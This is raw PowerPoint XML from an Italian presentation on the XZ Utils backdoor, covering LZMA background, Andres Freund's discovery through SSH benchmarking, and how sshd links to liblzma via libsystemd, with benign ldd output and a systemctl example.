                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>overview</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err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Il progetto iniziale si basa sull'algoritmo LZMA (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Lempel-Ziv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 Markov-chain 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Algorithm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), sviluppato dal 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maintainer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 di 7-Zip Igor Pavlov.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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  <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attualmente XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> usa primariamente l'algoritmo di filtro LZMA2. È progettato per creare file circa il 30% più piccoli di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> e ha un'API simile a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>zlib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> per facilitare l'integrazione nei sistemi esistenti. LZMA2 è ottimizzato per un'elevata compressione a scapito di CPU e RAM, ma è più veloce da decomprimere rispetto a bzip2. Supporta il concatenamento dei filtri per una migliore compressione e la compressione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>multithread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, con piani futuri per la decompressione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>multithread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic N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4341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6" y="3300"/>
            <a:ext cx="10524739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 sommario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14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2A27160-7963-656C-9FB1-68F8080C23CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198904" y="1792941"/>
            <a:ext cx="863413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Introduzione</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRP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b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>La scoperta di Andres Freund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La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Jia</a:t>
            </a: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 Tan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Struttura della backdoor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Forme di mitigazione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Cosa sappiamo oggi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1081212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scoperta di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>andres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>freund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15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latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Chi è Andres Freund</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Andres Freund è un ingegnere del software presso Microsoft, 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San Francisco. </a:t>
            </a:r>
          </a:p>
          <a:p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Più nello specifico, è uno sviluppatore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Postgre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.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2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Benchè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 non sia una figura esperta di sicurezza informatica, è stato il primo ad intuire una falla nella sicurezza dei sistemi Unix-like.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Il 29 Marzo 2024, una sessione di benchmarking di routine su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Postgre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 finisce per diventare una indagine approfondita che lo porterà a scrivere un articolo su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>OpenWall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, nella Open Source Security mailing list, per lanciare un allarme.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35088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scoperta di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>andres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>freund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16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latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Post su Mastodon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2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DD4AF1D8-72F5-9833-6DCB-D7787101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955" y="2923458"/>
            <a:ext cx="5219050" cy="3444162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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7D12961-5563-E61C-10F1-968D49FAF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39" y="2924957"/>
            <a:ext cx="5462005" cy="328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59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scoperta di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>andres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>freund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17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latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Pubblicazione su OSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Sulla mailing list Open Source Security, Andres Freund spiega di aver scoperto la backdoor a seguito di una sessione di benchmarking su una versione di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Debian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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Unstable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.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Analizzando la patch con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Valgrind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, nota che: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  <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>SSH impiega "parecchia" CPU;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  <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Ci sono errori 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e fallimenti di alcuni check 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attorno a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>liblzma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, parte di XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Utils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  <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>I login SSH impiegano più tempo del solito (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>0m0.807s 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anziché </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>0m0.299s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).</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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  <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>C'è un collegamento tra SSH e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>libzlma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?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Per alcune </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>distro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, sì: tramite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"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  <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic N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603295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scoperta di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>andres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>freund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18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49749"/>
            <a:ext cx="1186684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SSH, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r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 e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r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?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="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  <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pP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systemd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 è un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init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</a:rPr>
              <a:t>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daemon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</a:rPr>
              <a:t> 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di Linux: processo di boot, PID 1, gestisce i servizi di sistema e relative configurazioni (dette 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</a:rPr>
              <a:t>unit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);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/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Il protocollo SSH è implementato con la libreria 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</a:rPr>
              <a:t>OpenSSH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, costituita dai programmi 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ssh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</a:rPr>
              <a:t> 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(client) ed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sshd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</a:rPr>
              <a:t> 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(server), quest'ultimo rientra tra i system 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</a:rPr>
              <a:t>daemon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 di Linux;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pP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liblzma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</a:rPr>
              <a:t> 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è una libreria di compressione.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  <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p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In che modo sono collegati?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2746190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scoperta di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>andres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>freund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19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48474"/>
            <a:ext cx="11866844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SSH, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r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 e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r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?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="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  <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p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Come Andres Freund scrive nella sua mail, la libreria di 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systemd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,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</a:rPr>
              <a:t>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libsystemd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</a:rPr>
              <a:t>, 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ha tra le dipendenze la libreria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liblzma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. Diverse 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</a:rPr>
              <a:t>distro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, come quella presa in analisi da Andres Freund, presentano questa relazione. Esempio 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su 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Kubuntu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 22.04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 (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issue #32028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):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73ABEA-8696-43F0-8E00-1E551AE721AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="653143" y="4040084"/>
            <a:ext cx="10878291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     # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="16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ldd</a:t>
            </a:r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libsystemd.so.0 </a:t>
            </a:r>
          </a:p>
          <a:p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        linux-vdso.so.1 (0x00007fff97fbd000)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>liblzma.so.5 =&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1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  <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/x86_64-linux-gnu/liblzma.so.5 (0x00007f9519a77000)</a:t>
            </a:r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   </a:t>
            </a:r>
          </a:p>
          <a:p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 libzstd.so.1 =&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="16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</a:t>
            </a:r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/x86_64-linux-gnu/libzstd.so.1 (0x00007f95199a8000)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p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 liblz4.so.1 =&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="16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</a:t>
            </a:r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/x86_64-linux-gnu/liblz4.so.1 (0x00007f9519988000)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p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 libcap.so.2 =&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="16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</a:t>
            </a:r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/x86_64-linux-gnu/libcap.so.2 (0x00007f951997d000)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p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 libgcrypt.so.20 =&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="16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</a:t>
            </a:r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/x86_64-linux-gnu/libgcrypt.so.20 (0x00007f951983f000)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p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 libc.so.6 =&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="16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</a:t>
            </a:r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/x86_64-linux-gnu/libc.so.6 (0x00007f9519600000)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p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 /lib64/ld-linux-x86-64.so.2 (0x00007f9519b93000)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p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 libgpg-error.so.0 =&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="16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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="16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/x86_64-linux-gnu/libgpg-error.so.0 (0x00007f95195da000)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="160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3695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12832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 sommario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2A27160-7963-656C-9FB1-68F8080C23CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198904" y="1792941"/>
            <a:ext cx="863413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it-IT" sz="2800" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Introduzione</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRP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La scoperta di Andres Freund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La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Jia</a:t>
            </a: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 Tan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Struttura della backdoor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Forme di mitigazione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Cosa sappiamo oggi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3014622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scoperta di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>andres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>freund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20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48474"/>
            <a:ext cx="11866844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SSH, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r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 e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r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?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="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  <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p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In diversi sistemi Linux,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sshd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 può essere integrato con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systemd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 come servizio, con relativa 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</a:rPr>
              <a:t>unit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 ".service". Si utilizza infatti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</a:rPr>
              <a:t>systemctl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</a:rPr>
              <a:t> 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(la utility CLI per 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</a:rPr>
              <a:t>systemd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) per controllare tale servizio, esempio per startup:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sshd.service</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p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Le 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  <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>unit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 ".service" usano diverse funzioni (ad es.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sd_notify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  <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(),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sd_journal_printf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  <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>()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 ) di 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libsystemd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.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="24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02242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scoperta di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>andres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
